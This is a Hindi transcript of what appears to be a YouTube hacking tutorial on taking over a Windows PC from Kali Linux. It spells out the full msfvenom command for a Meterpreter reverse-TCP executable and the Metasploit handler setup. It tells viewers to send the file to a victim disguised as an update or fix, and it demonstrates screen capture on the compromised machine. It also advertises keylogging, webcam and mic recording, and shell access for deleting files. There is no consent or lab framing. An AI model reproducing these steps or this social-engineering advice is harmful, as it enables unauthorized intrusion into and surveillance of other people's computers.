हेलो फ्रेंड्स, आप देख रहे हैं टेक्निकल सागर यूट्यूब चैनल। मेरा नाम है अभिषेक सागर और आज मैं आपको सिखाऊंगा कि कैसे आप काले लिनक्स को इस्तेमाल करके एक विंडोज़ पीसी को हैक कर सकते हैं। तो हमें इसके लिए काले लिनक्स ऑपरेटिंग सिस्टम चाहिए। जैसे कि आप स्क्रीन पर देख सकते हैं, मैं विंडोज़ यूज़ नहीं कर रहा हूँ। अगर आपको नहीं पता है कि काले लिनक्स क्या होता है, मैं आपको बता देना चाहता हूँ कि काले लिनक्स एक ऑपरेटिंग सिस्टम ही है। जैसे विंडोज़ एक ऑपरेटिंग सिस्टम है, ऐसे ही काले लिनक्स एक ऑपरेटिंग सिस्टम है जो कि एडवांस लोग यूज़ करते हैं, जो कि हैकर्स, पेनिट्रेशन टेस्टर्स जो होते हैं वो इसको इस्तेमाल करते हैं चीज़ों को हैक करने के लिए और उनकी सिक्योरिटी चेक करने के लिए। विंडोज़ के साथ कुछ बेसिक्स वो आते हैं, टूल्स आते हैं, एसेसरीज आती है, नोटपैड वगैरह आता है, क्योंकि वो नॉर्मल लोगों के लिए है। यहाँ पर काले लिनक्स में एडवांस्ड टूल आते हैं जो कि हैकर्स के लिए बने होते हैं। तो ये ऑपरेटिंग सिस्टम हैकर्स के लिए है। अगर आपको नहीं पता है इसको कैसे इंस्टॉल करते हैं, तो मैंने पहले वीडियोज़ में बताया था कि इसको कैसे इंस्टॉल करना है। उस वीडियो का लिंक मैं डिस्क्रिप्शन में आपको दे दूँगा, आप वहाँ देख के इंस्टॉल कर सकते हैं। तो मैं ये एज्यूम करके चलता हूँ कि आपने अपने कंप्यूटर में काले लिनक्स इंस्टॉल कर लिया है और अब हम शुरुआत करेंगे अपने हैक की। इस हैक के 2 चरण होंगे। फर्स्ट वाले जो चरण में हम क्या करेंगे, जो पहला चरण होगा उसमें हम ये करेंगे कि एक वायरस बनाएंगे और अपने विक्टिम कंप्यूटर को, जिसको हम टारगेट कर रहे हैं, उसको भेजेंगे। और जैसे ही वो इस सॉफ्टवेयर पर क्लिक करेगा वो हमारे कंट्रोल में आ जाएगा। तो इसका जो पहला चरण होगा उसमें वायरस बनाएंगे, दूसरे चरण में हम अटैक करेंगे। तो चलिए पहला चरण या पहला स्टेप आप कह सकते हैं, उसको शुरू करते हैं। उसके लिए हमें टर्मिनल ओपन करना होगा। यहाँ से हमने टर्मिनल ओपन कर लिया। अब हम यहाँ पर MSF वेनम लिखेंगे। जैसे जैसे मैं लिखता जाऊँ आप उसको वैसे कॉपी करते जाइए। अगर आपको कुछ नहीं समझ आता है, आपको लगता है ट्यूटोरियल थोड़ा फास्ट है, तो आप पॉज करके देख सकते हैं। तो हम यहाँ लिखते हैं MSF वेनम, MSF वेनम स्पेस -P। -P का मतलब होता है पेलोड, स्पेस विंडोज़ स्लैश मीटर प्रेटर स्लैश रिवर्स अंडरस्कोर TCP। एल होस्ट इज इक्वल टू, एल होस्ट में आपको अपनी IP डालनी है। तो आपको IP नहीं पता है तो मैं बता देना चाहता हूँ, वो इंटरनेट प्रोटोकॉल होती है, हर एक कंप्यूटर की अलग होती है। लोकल और इंटरनेट वाली अलग अलग IPs होती हैं। तो अगर ये अटैक आप लोकल नेटवर्क में कर रहे हैं, मतलब ऐसे नेटवर्क में कर रहे हैं जैसे मान लीजिए एक राउटर है, उसी से सारे कंप्यूटर कनेक्टेड हैं आपके घर में, और आप ऐसे किसी कंप्यूटर को हैक कर रहे हैं जो आप ही के नेटवर्क से कनेक्टेड है, उस केस में आपको अपनी लोकल IP यूज़ करनी पड़ेगी। लेकिन अगर आपका विक्टिम या जिस पे आप अटैक कर रहे हैं वो कोई दूसरा इंटरनेट यूज़ करता है और बहुत दूर रहता है, तो आपको डायनेमिक IP यूज़ करनी पड़ेगी। डायनेमिक IP के बारे में मैं आपको इस वीडियो के बाद में एक और वीडियो बनाकर डाल दूंगा, या आप noip.com पर जा सकते हैं। ये एक वेबसाइट है, वहाँ रजिस्टर कीजिए, वहाँ से क्लाइंट डाउनलोड कीजिए और अपनी एक डायनेमिक IP बना लीजिए। लेकिन अगर आपको डायनेमिक IP बनाना नहीं आता तो उसका ट्यूटोरियल मैं इस वीडियो के डिस्क्रिप्शन में डाल दूंगा, वहाँ से देखकर आप अपनी एक डायनेमिक IP बना सकते हैं और अपनी लोकल IP की जगह, यहाँ पर मैं अपनी लोकल IP डाल रहा हूँ, आप लोकल IP की जगह अपनी डायनेमिक IP डाल सकते हैं। तो हम तो अभी लोकली कर रहे हैं तो हम अपनी लोकल IP डालेंगे। तो अगर आप भी लोकल IP डालेंगे तो आपको कैसे पता होगा कि आपकी IP क्या है? उसके लिए आपको एक नया टर्मिनल खोलना पड़ेगा। देखिए मैंने एक नया टर्मिनल खोल लिया और यहाँ पर मैं लिखूँगा ifconfig और एंटर कर दूंगा। आप देख सकते हैं यहाँ पर मेरी लोकल IP आ गई। मैं वायरलेस नेटवर्क से जुड़ा हुआ हूँ, मतलब ये जो लैपटॉप है, मेरा लैपटॉप जो है ये वायरलेस से जुड़ा हुआ, मतलब वाईफाई से जुड़ा हुआ है। तो हम वाईफाई वाला वो देखेंगे इंटरफेस। तो यहाँ पर मेरी देखिए आईनेट एड्रेस 192.168.1.103, ये मेरी लोकल IP है। ठीक है, हमें अपनी लोकल IP पता चल गई। यहाँ पर हम अपनी लोकल IP डालेंगे 192.168.1.103। उसके बाद स्पेस देंगे और एल पोर्ट लिखेंगे इज इक्वल टू 4444। उसके बाद हम एक स्पेस देंगे, -F देंगे। इसका मतलब होता है फॉर्मेट। तो आपको पता है कि विंडोज़ के जो सॉफ्टवेयर है उसका फॉर्मेट क्या होता है, EXE, एग्जीक्यूटिबल फाइल्स जिसे आप बोलते हैं। तो हम यहाँ लिखेंगे स्पेस दे के EXE, फिर एक स्पेस देंगे और A लिखेंगे। A मतलब आर्किटेक्चर,
कि आप जो सॉफ्टवेयर बना रहे हैं वो 64 बिट का होगा या 32 बिट का होगा। तो 32 बिट का होता है तो उसको 86 लिखते हैं। तो स्पेस देके हम लिखेंगे x86। उसके बाद हम एक स्पेस देके एक ब्रैकेट डालेंगे और स्पेस देने के बाद हम अपने सॉफ्टवेयर का नाम लिखेंगे। तो जैसे मान लीजिए मैं अपने सॉफ्टवेयर का नाम लिखना चाहता हूँ, जैसे मान लीजिए KO coco.exe और अब इसको एंटर कर देंगे। थोड़ा वेट कीजिए और अगर सब सही रहा तो ये एक मीटर प्रिंटर पेलोड बना देगा। आप देख सकते हैं पेलोड बन चुका है। पेलोड का साइज है 299 बाइट्स और उसका नाम था कोको। अब अपने रूट फोल्डर में हम जाके देखेंगे कि कोई कोको नाम का सॉफ्टवेयर है या नहीं। देखिए coco.exe। अब इसको आपको विक्टिम को भेजना है। तो ये पहला चरण था और जो कि खत्म हो चुका है। तो हम ये अज्यूम करके चलते हैं कि ये हम अपने विक्टिम को भेज चुके हैं। मैंने पहले ही एक मीटर प्रिंटर पेलोड बना लिया था और अपने कंप्यूटर में डाल लिया था। तो चलिए ये पहला चरण खत्म हुआ। आप किसी भी मीडियम से भेज सकते हैं। आप इस सॉफ्टवेयर को ईमेल कर सकते हैं, कहीं पे अपलोड करके उसका लिंक दे सकते हैं, ब्लूटूथ से भेज सकते हैं, वाईफाई कैसे भी भेज सकते हैं। बस आपको ये वायरस उस कंप्यूटर में भेजना है किसी भी माध्यम से, ठीक है। आप ये भी बोल सकते हैं कि ये आपके अपडेट करने के लिए या आपके कंप्यूटर को ठीक कर देगा। वो टोटली आप पर डिपेंड करता है, क्योंकि इसमें आपको थोड़ा सा दिमाग तो लगाना ही पड़ेगा। तो हम ये मान के चलते हैं कि हमने अपने विक्टिम के कंप्यूटर में वो वायरस या जो हमने मीटर प्रिंटर पेलोड बनाया था वो भेज दिया है। अब हम दूसरा चरण शुरू करेंगे जो है अटैक। तो हम अटैक करेंगे। यहाँ पर क्लियर लिख देते हैं जिससे ये पूरा क्लियर हो जाएगा। और यहाँ पर हम MSF कंसोल लिखेंगे जो मेटास्प्लॉइट फ्रेमवर्क को खोल देगा और उसी से हम अटैक करेंगे। देखिए स्टार्टिंग द मेटास्प्लॉइट फ्रेमवर्क कंसोल। इसमें थोड़ा टाइम लगता है। खुल चुका है ये। अब हम लिखेंगे यूज multi/handler और एंटर कर देंगे। उसके बाद हम पेलोड को सेट करेंगे। सेट पेलोड विंडोज मीटर प्रिंटर /reverse_TCP एंटर। अब यहाँ पर हम lhost सेट करेंगे अपना। सेट lhost स्पेस, हमारा lhost क्या था, यहाँ पर अपनी IP डालनी है। तो हमारी IP क्या थी 192.168.1.103। आपके केस में ये IP अलग भी हो सकती है, तो आप अपनी IP डालें। उसके बाद एंटर करें। उसके बाद L पोर्ट सेट करना है हमें। तो हम लिखेंगे सेट L पोर्ट स्पेस 4444 एंटर, क्योंकि हमने अपने पेलोड में भी यही पोर्ट डाला था। अब हमें क्या लिखना है, एक्सप्लॉइट, मतलब हम अटैक शुरू कर रहे हैं। एंटर। अब ये अटैक शुरू कर रहा है और जैसे ही दूसरे विक्टिम कंप्यूटर में वो सॉफ्टवेयर को कोई क्लिक करेगा तो उससे हमारा कनेक्शन बन जाएगा। जैसे कि आप देख सकते हैं हमारा कनेक्शन बन चुका है। मीटर प्रिंटर सेशन 1 ओपनड। अब उसके बाद हम देखते हैं कि जिस कंप्यूटर को हमने हैक किया उसकी इन्फॉर्मेशन क्या है। तो हम यहाँ लिखेंगे सिस इन्फो, जिसका मतलब होता है सिस्टम इन्फो, और एंटर कर देंगे। देखिए कंप्यूटर का नाम है सागर पीसी, विंडोज 7 चला रहा है, 64 बिट प्रोसेसर है, इंग्लिश US लैंग्वेज यूज़ कर रहा है, उसमें 3 यूज़र अकाउंट है और हमारे मीटर प्रिंटर पेलोड का जो आर्किटेक्चर है वो 32 बिट है। चलिए तो हम देखते हैं कि क्या क्या कमांड हम दे सकते हैं। तो हम हेल्प लिखेंगे जिससे कि सारी कमांड्स आ जाएंगी। ये पता चल जाएगा कि हम क्या क्या कर सकते हैं उस कंप्यूटर में। तो यहाँ आप देख सकते हैं माइक रिकॉर्ड कर सकते हैं, वेबकैम लिस्ट, वेबकैम स्नैप, अगर वो उसके पास वेबकैम है या फ्रंट कैमरा यूज़ कर रहा है वो, अगर उसके पास लैपटॉप है तो बहुत सारी चीज़ें कर सकते हैं। तो इसमें आप सारी कमांड देख सकते हैं और जो चाहें वो कर सकते हैं। मैं एक काम करता हूँ, मैं उस कंप्यूटर में से एक स्क्रीनशॉट लेने की कोशिश करता हूँ। तो हम यहाँ लिखेंगे स्क्रीनशॉट और एंटर कर देंगे और यहाँ पर ये स्क्रीनशॉट सेव हो चुका है रूट फोल्डर में। और आप देखेंगे हम रूट फोल्डर में, ये देखिए उस कंप्यूटर का स्क्रीनशॉट आ चुका है
ऐसे आप स्क्रीनशॉट ले सकते हैं और आप की लॉग भी कर सकते हैं, आप की लॉगर भी चला सकते हैं। तो की लॉग की कमांड भी आपको यहाँ मिल जाएगी। आप ये देख सकते हैं वो क्या टाइप कर रहा है, क्या सर्व कर रहा है, अभी क्या क्या कर रहा है, उसकी पूरी वीडियो कर सकते हैं। मतलब आपके पास बहुत सारे ऑप्शंस हैं, कुछ भी कर सकते हैं आप उसके कंप्यूटर में। आप उसके कंप्यूटर में शेल कमांड चला सकते हैं। शेल कमांड से आप उसके कमांड प्रॉम्प्ट को एक्सेस कर सकते हैं, और आपको पता है कि कमांड प्रॉम्प्ट से आप फाइल्स डिलीट कर सकते हैं, मूव कर सकते हैं, बहुत कुछ कर सकते हैं। आई होप आपको पता चल गया होगा कि कैसे आप काले लिनक्स का यूज़ करके एक विंडोज़ पीसी को हैक कर सकते हैं। अगर आपके कोई क्वेश्चंस हैं तो आप मुझसे पूछ सकते हैं। मेरे चैनल को सब्सक्राइब करें ताकि ऐसी वीडियोज़ आपको आगे भी मिलती रहे। थैंक यू सो मच। मिलते हैं अगली वीडियो में। गुड बाय।